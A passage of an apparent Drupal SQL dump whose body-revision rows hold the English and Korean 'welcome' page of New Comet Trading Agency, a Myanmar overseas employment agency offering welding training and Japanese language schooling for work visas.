Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">청년들에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받알 수 있도록&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스들을 제공하고 있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">New Comet Trading Agency Co.ltd</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">젊은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">치누들이 일본의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개발한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">첨단</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기술을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배우고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">꿈을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">실현할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고 돕고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본으로 취업비자</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">연수비자로 가기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">자격시험</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(JLPT, JFT, NAT-TEST, TOP-J)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">합격할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">어학당도</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및 교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">지원하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희는</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">”</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>”&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-weight:bold;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">우수한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기능인력을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배출하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">해외로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">파견하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">끊임없이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노력하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p><o:p></o:p></p><p>&nbsp;</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 1, 69, 'en', 0, '<h3>Welcome to Our Website \"NEW COMET TRADING AGENCY\"!!!!</h3><h3>안녕하세요.우리 웹사이트 \"뉴코멧 영업 대행사\" &nbsp;에서 환영합니다.</h3><img src=\"/sites/default/files/inline-images/new_comet_trading_agency_0.jpg\" data-align=\"center\" data-entity-uuid=\"42e9d2a3-e284-49bb-81cb-2510b37a5871\" data-entity-type=\"file\"><p><span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) license was obtained in 2023 and since then, the company has started to carry out service activities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">&nbsp;We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</span></p><p><span style=\"font-size:14.0pt;line-height:107%;\">Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard under the Ministry of Transport and Communications for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</span></p><p>&nbsp;</p><h3>안녕하세요.우리 웹사이트 \"뉴코멧 영업 대행사\" &nbsp;에서 환영합니다.</h3><p>&nbsp;</p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> ``New Comet Trading\'\'&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2004</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">설립되어</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업자등록번호</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(295/2004-2005)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">영업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧무역대행</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2023</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">외국인고용업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">면허를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취득하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">활동을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희 <strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong>&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"New Comet Overseas Employment Agency\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는자매</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\"> </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야뉴코멧 자동차 판매 및 서비스 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧회사</strong>등</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기업들과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">협력하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">경제통상자원부에서&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">차량</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수입허가를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">신청했고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">각종</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun 